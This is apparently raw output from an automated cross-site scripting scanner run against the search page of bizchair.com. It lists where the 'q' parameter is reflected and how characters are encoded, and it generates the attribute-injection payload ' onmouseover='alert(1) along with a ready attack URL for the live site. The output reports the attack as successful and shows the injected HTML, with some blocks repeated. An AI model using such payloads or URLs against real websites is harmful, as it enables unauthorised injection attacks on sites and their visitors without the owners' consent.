https://www.bizchair.com/all-leather-chairs/
b"\nGET Params:[2]\n['q', 'lang']\n"_______________________________________________________________________________________________________
https://www.bizchair.com/search?q=(uvw"xyz'yxz</zxy&lang=default

----------------------------------------------------------------------------------
Attribute Context: [2]
<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="(uvw&quot;xyz'yxz&lt;/zxy" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />
<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="(uvw&quot;xyz'yxz&lt;/zxy" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />

----------------------------------------------------------------------------------
HTML Context: [1]
<span class="no-hits-search-term">
&#40;uvw&quot;xyz&#39;yxz&lt;/zxy
</span>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False
b'\nAttack Payloads for ATTR\n["\' onmouseover=\'alert(1)"]\n'b"\nATTR Attack Url: https://www.bizchair.com/search?q=' onmouseover='alert(1)&lang=default"b"\n\n=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)"b'\nDetection of Payload: \n'b'<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="\' onmouseover=\'alert(1)" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />\n'b'<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="\' onmouseover=\'alert(1)" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />\n'ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False
b'\nAttack Payloads for ATTR\n["\' onmouseover=\'alert(1)"]\n'b"\nATTR Attack Url: https://www.bizchair.com/search?q=' onmouseover='alert(1)&lang=default"b"\n\n=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)"b'\nDetection of Payload: \n'b'<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="\' onmouseover=\'alert(1)" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />\n'b'<input type="text" id="q" name="q" class="text-field-4 w-input" maxlength="256" value="\' onmouseover=\'alert(1)" placeholder="" data-name="search" placeholder="Search product type, sku, color..." />\n'ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	True
b'\nAttack Payloads for HTML\n[]\n'_______________________________________________________________________________________________________
https://www.bizchair.com/search?q=&lang=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


